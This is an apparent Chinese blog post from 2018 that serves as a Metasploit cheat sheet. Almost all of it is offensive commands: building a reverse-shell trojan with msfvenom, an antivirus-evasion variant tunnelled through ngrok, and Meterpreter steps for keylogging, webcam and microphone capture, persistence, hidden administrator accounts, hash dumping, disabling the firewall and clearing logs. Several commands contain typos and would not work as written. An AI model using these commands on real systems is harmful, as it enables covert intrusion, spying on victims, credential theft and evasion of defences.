MSF基本使用

MSF

在这里插入图片描述

链接数据库

linux查找文件
 find / -name dabase.yml
链接数据库   db_connect -y   path/database.yml
db_status  查询数据库链接状态

payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload)

background 后台
sessions  -i  1  返回
sessions  -l  列出所有session

getwd   查看远程主机当前路径
getlwd  查看本地当前路径
search  -d c:\\   -f  *.doc  查找文件
upload   3.jpg  c:\\1.jpg   上传文件
cat test.txt  查看文件
download  c:\\phpstudy\\wke.doc  /root/wke.doc  下载文件
route  查看路由
getpid  查看当前进程ID
execute -H -f  calc.exe  执行文件
shell  开启shell
kill杀死进程
sysinfo  列出系统信息

进程迁移

ps  查看所有正在运行的进程
getuid  获取当前进程的用户
migrate 进程号  迁移进程     explorer.exe为桌面进程

开启键盘

keyscan_start  开启键盘记录 (需要有管理员权限)
keyscan_dump  显示记录的信息
keyscan_stop 关闭键盘记录

录制声音

record-mic -d 10  录制声音10秒

开启摄像头

webcam_list  查看摄像头连接
webcam_chat  开启摄像头
webcam_stop 关闭摄像头
webcam_snap开摄像头截屏
webcam_stream -i 1 -v true

桌面截屏

screenshot  截屏

开启VNC

run  vnc  开启vnc

持久化访问

run metsvc  安装持久化访问  
run metsvc  -r   卸载安装
另一种方法
run persistence -X -i 5 -p 445 -r ip

创建 隐藏用户

net user hacker$ hacker /add  创建隐藏用户
net localgroup  admininistators  hacker$  /add  添加用户到管理员组

用getgui创建用户  并分配管理员权限   开启远程桌面
run getgui -u hacker  -p hacker

获取凭证(用户名和密码)

run post/windows/gather/hashdump

判断是否为虚拟机

run post/windows/gather/checkvm

获取目标主机最近的操作

run post/windows/gather/dumplinks

获取系统安装程序个补丁

run post/windows/gather/enum_applications

通过shell关闭防火墙

shell
netsh  adcfirewall ser allprofiles srate off

开启端口转发

portfwd add -l 1235  -r  10.10.10.129  -p 3389
这样就把远程主机的端口 映射到本机的1235端口

清除日志

 clearev 清除日志

kali链接windows桌面

rdesktop  -u  admin  -p  admin  ip:port

kali命令行与窗口化切换

init 3 命令行  5桌面

msfvenom生成木马

msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost=10.10.10.128   lport=10001 -f exe > /root/config.exe

免杀木马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cclport=00000 -f c

-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)

木马的使用

设置tcp监听

use exploit/multi/handler
set payload   windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.128
ser lport 10001
run

远程主机运行木马

windows命令

net  use  查看网络链接
net  user  admin   123456   /add   添加用户
net  user   admin  密码    
net  user   admin    /del
posted @ 2018-11-10 18:46  浅笑996  阅读(259)  评论(0编辑  收藏  举报